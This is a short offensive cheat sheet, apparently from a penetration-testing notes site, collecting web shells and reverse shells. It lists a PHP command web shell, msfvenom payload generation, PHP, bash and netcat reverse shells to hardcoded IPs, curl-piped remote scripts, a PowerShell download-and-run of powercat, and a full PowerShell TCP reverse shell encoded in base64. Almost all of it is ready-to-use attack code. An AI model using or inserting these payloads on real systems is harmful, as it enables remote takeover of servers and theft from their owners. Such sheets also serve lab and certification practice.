WebShell or Reverse shell

PHP Webshell

<?php echo system($_GET['cmd']); ?>

Usage:

http://example.com/shell.php?cmd=whoami

We can add this command using Vulnerability like LFI, or RFI.

PHP Reverse shell

msfvenom -p php/reverse_php LHOST=192.168.45.213 LPORT=443 -o shell.php

We can place below content in a file named as shell.php and then run it.

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'");

<?php passthru("/bin/bash -i >& /dev/tcp/192.168.45.166/80 0>&1"); ?>

https://gist.githubusercontent.com/rshipp/eee36684db07d234c1cc/raw/9907b98ec63c6ad9bf5f39d14d07d9a3765f9079/shell.phpgist.githubusercontent.com

Bash

bash -c "bash -i >& /dev/tcp/192.168.45.213/443 0>&1"

SH

nc -e /bin/sh 192.168.45.213 443

Powershell base64 encoded reverse shell

curl -s https://gist.githubusercontent.com/tothi/ab288fb523a4b32b51a53e542d40fe58/raw/40ade3fb5e3665b82310c08d36597123c2e75ab4/mkpsrevshell.py | python3 - $IP_KALI 443 | xclip -selection clipboard

You can also use powercat.

# Make sure Python webserver is running.
IEX (New-Object System.Net.Webclient).DownloadString("http://192.168.119.3/powercat.ps1");powercat -c 192.168.119.3 -p 4444 -e powershell

convert to base64 using a script.

pwsh
# Replace it with above value
$Text = '$client = New-Object System.Net.Sockets.TCPClient("192.168.119.3",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'

$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)

$EncodedText =[Convert]::ToBase64String($Bytes)

$EncodedText

# Final command:
powershell --enc "$EncodedText"

PreviousFTP NextEncoding Tool

Last updated 11 months ago